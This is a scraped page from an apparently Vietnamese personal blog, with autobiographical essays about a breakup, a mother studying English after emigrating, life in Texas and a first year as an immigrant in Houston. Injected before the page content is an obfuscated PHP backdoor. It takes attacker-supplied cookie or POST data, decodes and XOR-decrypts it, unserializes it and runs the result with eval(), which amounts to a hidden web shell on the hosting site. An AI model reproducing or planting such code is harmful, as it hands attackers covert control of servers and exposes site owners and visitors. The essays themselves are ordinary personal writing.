$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> Another Me – Page 4 – B.l.u.e

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

Category: Another Me (page 4 of 13)

tình mười năm còn lại mấy tờ thư

Anh rất thích viết thư. Hồi anh còn học lớp 7, có cuộc thi viết thư UFO gì đó, anh cũng đăng kí tham gia. Chỉ tiếc là người ta tưởng anh nhờ Victor Hugo hay Alexandre Dumas viết, thế là họ không trao giải thưởng cho anh.

Anh và em chia tay. Anh mỗi ngày đều viết cho em một email. Trong đó toàn những bài nhạc mà anh nghĩ là em thích – những bài mà anh cả đời có lẽ cũng sẽ không bao giờ nghe, nhưng vẫn năn nỉ thằng bạn anh copy đầy một ổ cứng cho anh.

null

Hộp mail em, em đưa password người khác vào đọc. Anh chỉ biết được khi người đó đem khoe với một con bé, ừ, con bé này là bạn anh.

Từ đó, anh ngừng việc viết thư cho bất cứ ai.

***

Các tiệm ăn của người châu Á bên này, ở bàn tính tiền hay có cái lọ để bánh qui tráng miệng. Nó có tên là Fortune Cookies. Thật ra trong đó chỉ gồm cái bánh qui nhỏ, và một câu trích dẫn nào đó. Một ý tưởng hay đấy nhỉ?

Bữa nọ, anh tình cờ lấy được câu này trong cái bánh qui

null

Someone in your life needs a letter from you

Anh rất thích viết thư. Nếu em cảm thấy bực bội, khó chịu vì thế, thì nói anh, chứ đừng làm như cô ấy, anh buồn, nhé!

B.l.u.e.

khóc

null

Ông bà ngoại hay kể là hồi bé mẹ học rất giỏi. Mẹ thi đậu vào trường Nữ sinh Gia Long với điểm cao. Thế rồi sự kiện 30/4 xảy ra, cả nhà ông bà ngoại phải di tản về quê, mẹ và các anh chị em của mình không ai được đến trường tiếp. Cái thị xã nhỏ, nghèo nàn, việc có một trường tiểu học dạy cho trẻ em biết đọc, biết viết âu cũng là làm hết sức rồi, mơ sao tới được trường trung học đây?

Người ta hay nói mỗi đứa trẻ sinh ra đời đều sinh dưới một vì sao nào đó. Đôi khi tôi hay tự hỏi phải chăng người ta không yêu cầu tất cả thiên thần học về hình học trên thiên đường, nếu không tại sao ngôi sao của mẹ tôi lại được vẽ một cách méo mó đến thế?

Mẹ đi vượt biên, đi ba lần thất bại ba lần. Các em của mẹ lần lượt đi qua Mỹ thành công hết. Mẹ ở lại Việt Nam, mỗi lần nhận hình các em mẹ tốt nghiệp đại học, mẹ cười, nhưng tôi biết mẹ buồn.

***

Trước khi nhà tôi đi Mỹ tầm ba tháng, tôi thấy mẹ khi bán hàng cứ cầm riết cuốn sách Streamline để tự học Anh Văn. Mẹ đã tới rồi cái tuổi trung niên, mẹ tự học nên cứ học trước lại quên sau. Cái cuốn Streamline ấy chỉ nhàu nhàu, nhăn nhúm ở vài chục trang đầu. Qua đây rồi, mỗi lần đi các cửa hàng để mua đồ cuối tuần, gặp chuyện gì cần nói, mẹ toàn phải gọi điện thoại về đưa tôi nói.

Ông ngoại tôi khi qua đây cũng đã hơn sáu mươi, ông vẫn tới trường học. Vì thế ông ngoại khuyến khích mẹ tôi đi học. Nước Mỹ chưa từng ngoác mỏ rêu rao cả ngày rằng: chúng tao rất đề cao giáo dục (hoặc hắn rêu rao trong khi tôi đang nghe rock nên tôi không biết chăng?) nhưng ở đây, mọi người đều có cơ hội đến trường. Tôi đã mấy lần đi vào trong trường mà em tôi đang học, và khá ngạc nhiên vì vẫn có nhiều người đúng tuổi đi học dù điều này tôi từng được nghe kể trước.

Quay lại chủ đề đang nói, mẹ quyết định sẽ đi học, sau giờ làm, chả phải học mấy cái cao xa, chỉ là học Anh Văn để có thể giao tiếp và đọc viết. Cái vấn đề là bạn không thể cứ vác cặp sách rồi chui vào lớp được. Đăng kí học bên này, phải nói chuyện với conseleur, rồi mới thi xếp lớp này nọ để đi học. Mẹ không thể gọi điện nói được, mẹ nhờ tôi. Tôi lên trang web của trường, may mắn thay tìm được số của một conseleur người Việt, tôi đưa cho mẹ để mẹ gọi người ta. Hơn một tuần liền, mẹ gọi, cô đó đang đi nghỉ phép nên không nhận điện. Mẹ gọi cho tôi, mẹ nói tôi gọi số điện thoại của trường để hỏi cho mẹ.

***

Vài hôm trước, mẹ đi làm về sớm, mẹ gọi tôi khi tôi đang ở công ty. Mẹ hỏi tôi đã hỏi cho mẹ chưa. Tôi lười lắm nên trả lời mẹ: thôi mẹ cứ chờ người ta đi nghỉ phép về rồi là nghe điện thoại mẹ ngay mà. Giọng mẹ nghèn nghẹn, mẹ chỉ bảo tôi:
– Nếu trễ thời hạn đăng kí, người ta không cho mẹ đi học thì sao con? Mẹ muốn đi học mà con…
Tôi nghe lòng mình thắt lại. Tôi buồn, rất buồn, và rất hối hận.

Hôm nay, tôi lái về thăm nhà. Mẹ vẫn thế, mẹ quên hết mọi thứ, cứ ngồi giục tôi ăn cơm cho nhanh, cho nhiều vào. Tôi thích ăn canh chua cá lóc, lần nào tôi về mẹ cũng nấu cả nồi để cho tôi. Tôi ăn xong, nằm dài trên sofa chơi game một lúc. Đến khi tôi vào nhà tắm định tắm rồi đi ngủ, khi bước ngang qua phòng mẹ, thấy bóng mẹ ngồi lom khom với cái kim từ điển đang đánh vần từng chữ tiếng Anh, tôi chui vào buồng tắm, xả vòi sen.

Và khóc…
.

you may all go to hell, and i will go to Texas

null

Các cửa hàng lưu niệm ở Texas mỗi lần nhìn vào doanh số bán hàng của mình có lẽ sẽ cần phải cảm ơn Davy Crockett. Câu nói cách đây gần 200 năm của Davy, giờ trở thành một trong những câu được in nhiều nhất trên các áo thun, li, cốc… ở xứ sở cao bồi này.

Người ta thường ít ai muốn tới Texas – một vùng đất đầy nắng và gió; vùng đất của những cánh đồng rơm vàng cái màu vàng cháy khen khét, của những đồng hoang đầy sỏi đá.

Miền Viễn Tây được khắc họa qua các bộ phim cao bồi của Hollywood luôn là nơi của những kẻ ngoài vòng pháp luật, những tướng cướp liều lĩnh, những tay săn tiền thưởng sống trên đầu ngọn súng, lúc nào cũng đùa giỡn với mạng sống của mình. Lạ kì thay, tôi lại bị cuốn hút bởi cái khung cảnh của miền Viễn Tây hơn là những cảnh đẹp thanh bình, lung linh khi xem film ngay từ lúc nhỏ. Phải chăng, chủ nghĩa anh hùng ngang tàng luôn dễ đi vào lòng người hơn?

Texas cũng giống như đại mạc trong Xạ Điêu anh hùng truyện của Kim Dung, hay trong các cuốn truyện sến đầy nước mắt của Thương Nguyệt, đầy khắc nghiệt nhưng cũng đẹp nét đẹp của sự hoang dại.

***

Ngày mà Yahoo Answer còn được kha khá người quan tâm, đại loại có một câu hỏi được nhiều người tham gia thảo luận: người dân ở tiểu bang nào liều lĩnh nhất? Câu trả lời chiếm đa số là: Texas. Chẳng phải vậy mà người ta hay nói: lái xe như bọn Texas ấy sao?

Ngay đầu đường vào căn nhà tôi đang ở là một ngôi nhà nhỏ, xung quanh trồng đầy hoa. Một ngày nọ, khi cùng Charles đi làm về, chúng tôi thấy một ông cụ đầu tóc đã bạc phơ, đang ngồi lau súng trước cửa nhà. Charles và tôi về nhà cất xe, và đi bộ tới trò chuyện với ông cụ. Ông cụ đem khoe một loạt khẩu súng và nói:
– Ngày nào tôi cũng ngồi trước nhà lau súng thế này đấy. Bọn nào có ý đồ xấu đi ngang qua, thì bọn chúng tốt hơn là nên biết một điều: tôi chả sợ cái con mẹ gì hết; bọn nào thử tới cướp xem tôi có bắn chết bọn khốn đó ngay trước ngưỡng cửa nhà không?

Đấy, người Texas rất liều, và dường như chả biết sợ là gì…

***

Tôi không phải là người ngang tàng. Tôi nhát và sợ chết lắm. Nhưng tôi thích cái vùng đất đầy nóng nực này. Tôi thích con người ở đây, nóng nảy nhưng rất thẳng thắn, sòng phẳng. Đặc biệt, tôi thích cái cảm giác ngồi trong xe, mở toang cửa kính, một tay cầm lái, tay cầm li cafe đen đậm đặc, phóng vù vù qua những con đường nhỏ hẹp, ngoằn ngoèo, trên đầu là mặt trời chói gắt, nhưng mây rất trắng, và trời rất trong, trong tiếng nhạc ầm ầm đầy chát chúa…

Cảm giác đầy tự do, đầy phóng khoáng, như không bị bất cứ gì ràng buộc. Không vui, không buồn, không nhớ, không đau. Chỉ có bản thân mình là duy nhất.

B.l.u.e.

Sài Gòn của em

Em gọi tôi là Sài Gòn của em, nhưng tôi chưa hề gọi em lại là Hà Nội của anh. Việt Nam chỉ có một thủ đô Hà Nội, không có nghĩa là tôi chỉ có quyền gọi duy nhất một-cô-bé-nào-đó là Hà Nội của anh. Không, không ai cản được tôi nếu tôi muốn. Tôi không gọi, chỉ vì tôi thành thật.

***

Em buzz YM đúng lúc tôi đang loay hoay quét nhà. Khi tôi ngó vào màn hình máy tính thì em đã out, chỉ còn vài dòng chữ để lại:

Sài Gòn của em!
Em không chờ anh, em sắp lấy chồng…

Tôi nhắn vội em câu thơ của Đồng Đức Bốn: em có bỏ chồng về ở với tôi không? từ đó đến giờ, và chưa thấy em trả lời. Có thể em quá bận bịu với việc chuẩn bị tổ chức đám cưới. Hoặc giả chồng em – một con quái vật hung tợn, cấm không cho em vào YM để chat với tôi. (À, tôi không biết mặt chồng sắp cưới của em, nhưng tôi mặc định tất cả người yêu hiện tại của người yêu cũ của tôi ngày xưa đều là quái vật hung tợn. Và tôi, đau đớn thay, đã thua trong công cuộc đi hái nấm để giải cứu công chúa – là em, dù không phải em nào tôi quen cũng xinh như công chúa).

***

Cô bé Hà Nội kia, tôi chắc là chỉ tầm vài tháng sau là cô đã quên ngay việc cô từng gọi một thằng con trai xa lạ nào đó là “Sài Gòn của em”.

Còn tôi, tôi là người thành thật. Người thành thật có thể tán hơn một cô gái tại một thời điểm. Nhưng người thành thật thì không thể gọi hơn một cô là Hà Nội của anh. Chính ra là phải dùng từ “nào khác”. Mà thôi, đằng nào cũng quan trọng quái gì đâu.

B.l.u.e.

oải hương

lavendar

Khi đang ngồi ăn Phở ở quán ăn Việt Nam, Jason có nói với tôi:
– Tao thấy rất thích cách mà dân Việt chúng mày mấy thế hệ sống cùng với nhau trong một nhà…
Khi ấy, tôi đang loay hoay bê tô phở lên húp lấy húp để, chưa kịp đặt xuống trả lời, thì Jason tiếp:
– Như tao, năm tao 18 tuổi, một ngày tao canh bố mẹ tao ra ngoài, tao dọn đồ hết, ra ngoài ở. Sau đó chỉ gọi điện về mà báo: Con dọn ra rồi…
Nhún vai một cái, tôi hỏi:
– Ừ, rồi sao nữa?
Jason trả lời:
– Giờ tao có con mới nghĩ rằng, sau này nếu bọn nó 18 tuổi, bọn nó cũng làm vậy (mà thật ra hầu như bọn thanh niên Mỹ toàn thế – Jason tiếp lời), chắc tao buồn lắm…
Giọng có chút nghẹn ngào, Jason tiếp tục:
– Sống hơn 2/3 đời người rồi, mới thấy đích thực gia đình là quan trọng nhất.

***

Tôi đi làm xa nhà, thật ra cũng chỉ là 250 dặm với bốn tiếng lái xe, nhưng mẹ tôi lúc nào cũng lo lắng như thể tôi đang cầm thanh gươm, xông vào hang rồng để hiếp công chúa, nhầm, để cứu công chúa khỏi bị hiếp tới nơi. Ngày nào mẹ cũng gọi điện hỏi tôi đi làm về chưa, có mệt không, hôm nay ăn món gì, nhớ đi ngủ sớm nhé… Chả hiểu sao, mỗi lần khi tôi nói là nấu ăn xong dọn dẹp mệt lắm, nghe mẹ bảo: con cứ ra ngoài ăn, không đủ tiền thì mẹ cho tiền mà ăn… dù lương tôi hiện tại hơn mẹ nhiều lắm, mẹ phải trả tiền điện tiền nước tiền chợ búa đủ thứ nữa, thì tôi lại thấy mắt mình hoe hoe đỏ.

Cinderella có bài hát rất nổi tiếng: Don’t know what you got (till it’s gone), nhưng có nhiều thứ, chưa cần mất đi, ta vẫn biết là quí giá. Phải không?

***

Tôi lái xe về nhà, tôi ngủ trên chiếc giường chật hẹp. Chiếc giường này vốn là của một người bà con không xài, nhìn cũng còn khá mới. Nó rất hẹp, tôi ngủ mà lăn một vòng là rớt cái bịch xuống đất ngay. Đã thế, nó lại còn ngắn, tôi nằm toàn dư cả cái chân ra thôi. Khi mang nó về, mẹ ái ngại hỏi tôi:
– Thế này con ngủ được không?
đợt đó nhà tôi mới sang, chưa ai có việc làm, thôi thì gắng chịu một xíu cũng được. Tôi mỉm cười gật đầu cho mẹ vui lòng.

Mẹ tôi hay xài nước xả hiệu Downy, mùi hoa oải hương khi giặt đồ. Tôi thì bị viêm xoang từ lâu, tôi dị ứng với mấy mùi như thế. Đó là lí do khi ở nhà, tôi toàn lăn xuống đất hay ra sofa mà ngủ.

***

Bất chợt, đêm qua tôi mới nhận ra tôi thích cái mùi đó đến lạ. Bạn có thể trả lời tôi câu hỏi: tại sao chăn và gối trong căn phòng nhỏ của tôi lúc nào cũng mùi oải hương thơm phức, bất kể là tôi về nhà sau hai, ba hay bốn tuần không? Tôi thì không tin Downy thơm lâu như thế rồi…

Đêm nằm, co người lại, ngửi cái mùi oải hương ấy, chỉ thấy ấm cả lòng…

Hoàng Hải..

Một năm ở xứ sở cờ hoa

Đường lối và cương lĩnh cách mạng của các cụ Mác Lênin có chửi bọn tư bản giãy chết đến đâu đi nữa thì cũng khó có thể khiến người ta phủ nhận một điều: những xứ sở nơi trời tây là thứ ánh sáng chói rực rỡ, hay như một cái hồ không đáy luôn cuốn hút ước mơ, mong mỏi của bao triệu con người ở khắp nơi trên thế giới.

Đối với Mỹ – kẻ không phải cầm đầu nhưng lại là tên sừng sỏ nhất, thì điều đó lại càng đúng. Người ta hay nói về giấc mơ Mỹ. Người ta biện hộ cho việc mình muốn đặt chân tới đây bằng nhiều mĩ từ khác nhau (vì vốn trên đời có kẻ nào vui khi bị gán ghép là sính ngoại, chạy theo thứ hào nhoáng, phù hoa… đâu chứ?).

I dreamed a dream – một năm như bóng câu qua cửa sổ, giấc mơ Mỹ của riêng tôi vẫn đang tiếp tục – giấc mơ không hoàn toàn chỉ có hình dáng của bà bụt, ông tiên… mà còn có những tháng ngày buồn bã, thất vọng…

***

Tôi đặt chân đến Mỹ với không một cái gì trong tay – ngoài bằng cử nhân (chưa kịp lấy) ở Việt Nam – mà ai cũng bảo là sẽ chẳng được công nhận. Houston chào đón tôi bằng một bầu trời xám ngắt, bằng cơn mưa không nặng hạt nhưng đọng lại thành những vệt dài trên cửa kính xe như đang khóc theo điệu bài hát Thành phố buồn mà radio đài người Việt đang phát.

Khi đặt chân xuống sân bay, hành lý của tất cả mọi người đều đi qua, chỉ hàng hóa của chúng tôi bị giữ lại. Những cái áo, đôi giày… vừa mua ở Việt Nam, bị hải quan sân bay – một lão già Trung Quốc cau có, khó chịu – qui cho là đem sang Mỹ buôn bán mà không khai, để trốn thuế. Bằng thứ tiếng Anh lõm bõm của mình, tôi bảo tay đó:
– Cái áo này có tầm 8$, anh nghĩ chúng tôi bán lại được bao nhiêu?
Bao nhiêu hải quan sân bay quanh đó đều đồng ý, chỉ có lão già đó trả lời:
– Tao không tin được bọn người Việt Nam.

Ôi thương thay cho cái suy nghĩ đầy thiên kiến của một người đầu đã được hai thứ tóc. Tôi định nói lại tiếp thì lão ấy nói:
– Đây là Mỹ. Chịu thì vào, còn không thì quay lại.
Thế là chúng tôi phải để hành lý lại, cứ chui tọt vào nước Mỹ đã rồi tính gì tính. (Tất nhiên là sau này, khi sân bay thuê người kiểm định giá trị tài sản, chúng tôi lấy lại mớ hành lý đó không một chút khó khăn gì). Đấy, cái giấc mơ Mỹ của tôi bắt đầu bằng một hành động đầy phân biệt – dân – tộc như thế (dù ông ta cũng chỉ là người Châu Á – da vàng, mũi tẹt như tôi, hay ông nghĩ đất nước ông đứng ở vị trí cao hẳn hơn?)

***

Nhắc lại, tôi qua đây khi vừa tốt nghiệp đại học được một tháng, với tấm bằng nhờ bạn bè hết lòng kéo lên, được đúng 7.000000001. Thật may mắn.
Tôi qua đây đúng lúc kinh tế Mỹ đang tụt dốc không phanh – mà tôi dám chắc là chỉ thua cái tốc độ tôi cởi đồ con gái thôi. Các cậu dì của tôi lớn lên ở đây, tốt nghiệp đại học bên này, làm việc đã bao nhiêu năm, nhưng người thì thất nghiệp, người thì lo ngay ngáy sắp bị mất việc.

Thế là tôi đi xin một chân chạy bàn, và ôn thi GRE để gắng thi vào cao học.

GRE là một bài thi rất chó chết, ngay cả dân bản xứ còn thấy khó nhằn (đâu như nếu học ở trung tâm ngốn hơn 2000 Mỹ kim), huống hồ là một người đến từ đất nước mà tiếng Anh không phải tiếng mẹ đẻ như tôi.

Tôi làm phục vụ bàn ở một nhà hàng Việt Nam, công việc cũng không có gì nặng nhọc, nhưng cũng chỉ làm được có tầm một tháng là nghỉ, lí do nhà hàng ế quá, dạo này kinh tế xuống, dân Việt mình tiết kiệm toàn mang theo đồ ăn đi làm, ít hẳn người buổi trưa ra ngoài ăn.

Thế là tôi lại chỉ ở nhà học ôn thi GRE. Mà cái sự học đó cũng chắn ngắt, ngồi cả ngày ở thư viện, gắng nhét vào đầu hơn 70 từ tiếng Anh (mà toàn lạ hoắc lạ hươ)/ ngày, trong khi xung quanh toàn các bé gái teen cười cười nói nói bàn về anh người sói, anh ma cà rồng, chị gái ngu ngốc…

Cứ ở nhà chỉ đi đi lại lại học học hành hành (và chả biết khi nào mới xong), cái chán nhất không phải là cái nhìn của mọi người. Đôi khi có những người bà con xa – mà nếu không qua đây thì tôi thề là tôi sẽ chẳng bao giờ biết, nhìn tôi với ánh mắt giả vờ như quan tâm: ôi, đâu có ai bên đây ngồi không thế cháu, cháu phải kiếm việc gì làm chứ… Cô/ chú/ bác sống bên này lâu rồi nên biết. Bằng đại học ở Việt Nam ai công nhận đâu mà cháu đòi học cao học. Tôi thì ngoài gái nói anh làm tình với em nhé tôi còn quan tâm, còn lại xem như cỏ rác, à mà đổ rác cũng tốn tiền, thôi xem như gió thổi vậy. Do thế, cái tôi thấy chán nhất là chính bản thân tôi. Cứ ngồi không thế, nhìn ba mẹ và em gái cực khổ đi làm, đôi khi cũng tệ lắm.

***

Tôi cũng thử gửi đơn xin vào vài chỗ làm về công nghệ thông tin. Nhưng như đã nói, chẳng việc gì trong cả chục lá đơn apply, người ta chú ý tới một thằng học đại học mà chả ai biết là đại học gì, gọi điện thoại thì nói chữ được chữ không. Thế là nộp cho có thôi, tôi cũng chả hi vọng nhiều.

Rồi tôi nhận được email từ một công ty ở Dallas, với link bài test kiến thức chuyên môn. Tôi hoàn thành chẳng khó khăn gì (trời ơi, tôi đạt điểm cao nhất luôn cơ đấy). Thế là công ty đó mua vé máy bay cho tôi tới phỏng vấn. Sau đó là thuê khách sạn cho tôi ở 3 tuần trong thời gian thử việc.

Quá trình thử việc diễn ra thật may mắn. Tôi nhận được offer chính thức. Ngày đó tôi mừng ơi là mừng. Chẳng có bà bụt, ông tiên nào hóa đũa thần vào giấc mơ, chỉ có những đêm thức trắng, ngồi code đến mỏi nhừ cả tay, đau cả mắt mà thôi…

Cùng thời điểm này, ba mẹ tôi cũng có việc làm (cũng gọi là khá đối với những người mới qua), em tôi xin được vào học college. Thật may…

***

Một năm chỉ hơn 1000 từ tóm tắt, nói ít không phải ít, nói nhiều cũng đủ là khá nhiều. Cái giấc mơ Mỹ của riêng tôi vẫn chưa thể dừng, tôi sẽ vẫn còn phải mơ tiếp và bước tiếp.

***

Giấc mơ Mỹ của tôi, không có bóng em…

030710
B.l.u.e


.

nothing else matters

Pantera – band thrash mà em thích chỉ sau Megadeth, có một bài tên là Cemetery Gates rất hay. Trên đường đi làm về, em đi ngang qua một nghĩa trang. Lần nào chuẩn bị tới đó, em cũng canh chỉnh bài này (dĩ nhiên là trừ lúc em quên). Bài “Cemetery Gates” có một câu mà lần nào nghe, em cũng rất buồn:

You left me incomplete
All alone as the memories still remain

***

Cô ấy quay đi, bỏ lại một em không trọn vẹn. Mặc dù em vẫn là em, hiền lành cộng với tài ba, dễ thương lại thêm ngoan ngoãn, nhưng em biết, đã có gì đó trong em bị đánh cắp đi.
Kể từ khi cô ấy xa em, những cuốn sách đầy chữ duy nhất em đọc là sách phục vụ cho việc học và các tiểu thuyết tiên hiệp đầy rẫy trên mạng.
Kể từ khi em xa cô ấy, em nghe rock ít hẳn đi. Hay nói đúng ra là em không nghe rock một mình nữa.

***

Chiều nay, lục lại mớ quần áo tìm cho mình cái áo Pantera mới mua để mặc đi xem rock, em thấy cái áo quây của cô ấy. Là của cô ấy, chứ không phải của cô gái nào khác. Em biết thế, dù cho em không thể ngửi ra cái mùi quen thuộc của cô ấy (mà thật ra, em cũng quên rồi).

Old stuff brings back old memory…

***

Em nghe James đánh guitar thùng rất nhẹ nhàng và hát Nothing else matters. Em cúi đầu, lắc thật mạnh. Người ta nhìn vào sẽ không biết là mắt em đang rất buồn, đâu nhỉ?

***

Em đọc blog cô ấy, thấy cô ấy có vẻ buồn. Em gửi tin nhắn ngoài YM, không thấy cô ấy reply.

Là do cô ấy, hay do YM nhỉ?

À, dù sao, cũng là nothing else matters

B.l.u.e.

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.